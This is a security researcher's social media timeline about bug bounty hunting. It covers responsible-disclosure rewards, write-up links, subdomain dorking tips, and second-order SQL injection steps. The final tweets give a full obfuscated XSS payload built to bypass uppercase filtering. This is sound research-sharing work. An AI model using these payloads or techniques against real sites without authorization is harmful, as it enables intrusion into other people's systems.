Cybersecurity Researcher | Bug Bounty Hunter ❤
Joined November 2014
- Tweets 174
- Following 52
- Followers 519
- Likes 379
32 Photos and videos
Pinned Tweet
13 Jun 2023
VDP to Bounty!! I was awarded a $250 bounty on @Hacker0x01!
I started hunting on a VDP. Luckily I found an open redirect. Reported it via their website's responsibile disclosure page. Got a verification email from hackerone.
hackerone.com/hamzaavvan #TogetherWeHitHarder
3
4
95
7,308
21 Jun 2024
I just published in @gitconnected Quick & Easy $100 Bug That You Can Find In 5 minutes levelup.gitconnected.com/qui…
1
16
111
4,725
15 May 2024
Bug Bounty Intigriti Challenge 0223 Stored XSS Via Image Exif youtu.be/lCcSILKgLcs?si=SKZ8… via @YouTube
1
512
11 May 2024
I just published in @gitconnected 4 XSSs With A Simple & Optimized Payload levelup.gitconnected.com/4-x…
1
14
71
4,460
6 Apr 2024
A Unique Tale Of P1: Exposed GraphQL Leads to Mass User Account Takeovers medium.com/@hamzaavvan/a-uni…
29
83
4,317
25 Jan 2024
Check out my playlist: Road To Ethical Hacking youtube.com/playlist?list=PL… via @YouTube
1
3
443
Hamza Avvan retweeted
1 Nov 2023
31 Oct 2023
Dozens reported killed in explosion in northern Gaza refugee camp bbc.in/46No7YW
92
13,538
58,366
2,757,257
Hamza Avvan retweeted
3 Oct 2023
.@hamzaavvan has made some awesome YouTube Shorts answering my #AppSec interview questions! Check them out: youtube.com/playlist?list=PL…
4
23
5,018
9 Jul 2023
Second-order SQL injection on view parameter.
1. Create a malicious note with SQLi payload through /?note=<payload> parameter.
2. Goto /?view to execute your SQLi payload
#SQLI #bugbountytips
7 Jul 2023
Vulnerable Code Snippet 💀
🥁 This time we have improved the experience by making it possible to run this code snippet in a docker environment!
Can you find the bug this time?
Practice your skills and try it yourself on our Github👇
github.com/yeswehack/vulnera…
#YesWeRHackers #BugBounty #YWHSnippet
ALT YesWeHack - Vulnerable Code Snippet
1
11
2,226
23 Jun 2023
Worth trying for anyone who wants to improve their XSS skills or learn something new. XSS via stylesheet injection challenge by @yeswehack.
#YesWeRHackers
2
4
14
3,419
13 Jun 2023
VDP to Bounty!! I was awarded a $250 bounty on @Hacker0x01!
I started hunting on a VDP. Luckily I found an open redirect. Reported it via their website's responsibile disclosure page. Got a verification email from hackerone.
hackerone.com/hamzaavvan #TogetherWeHitHarder
3
4
95
7,308
13 Jun 2023
Hackerone triager set its state to pending program review. Program manager came, triaged my bug and transferred the report from VDP to its private program and I got an invite too. After accepting the invite I was amazed to look at the bounty table 😁
1
6
750
13 Jun 2023
That was a fascinating journey for this finding. Thanks @Hacker0x01 and the private program for all this.
Moral of the story: Never ignore the VDPs..
#bugbountytip
5
677
12 Jun 2023
I found even more subdomains and XSSs 😂 using dork like:
site:*.target.*
site:*.target.com.*
site:*.target-*.*.*
#bugbountytips #dork #OSINT
12 Jun 2023
Till Today I used to think site:*.target.com means all subdomains. 🤓
But that actually means just 1st order subdomain! 😭
So if you search site:*.*.target.com you will get all second-order subdomains.
site:*.*.*.target.com = Third order Subdomains.
#bugbountytip #BugBounty
2
6
697
7 Jun 2023
🔴 Challenge
During hunting, I encountered a situation where injected code was converted to uppercase.
8
28
154
12,637
7 Jun 2023
Eventually, I reported four XSS vulnerabilities to the Bugcrowd program using my payload, and all of them were triaged.
Note: Please encode the payload before injecting or the ( ) which is used for concatenation would be interpreted as space.
2
4
1,400
8 Jun 2023
🆕Update to payload
✅Working Payload (Edge/Chrome/Firefox): A=![] '';B=!![] '';C=[][[]] '';F=[][C[4] C[5] A[2] B[0] A[4] B[1]];D=F '';F[D[3] D[6] C[1] A[3] B[0] B[1] C[0] D[3] B[0] D[6] B[1]](A[1] A[2] A[4] B[1] B[0] '(1)')()
3
7
19
1,535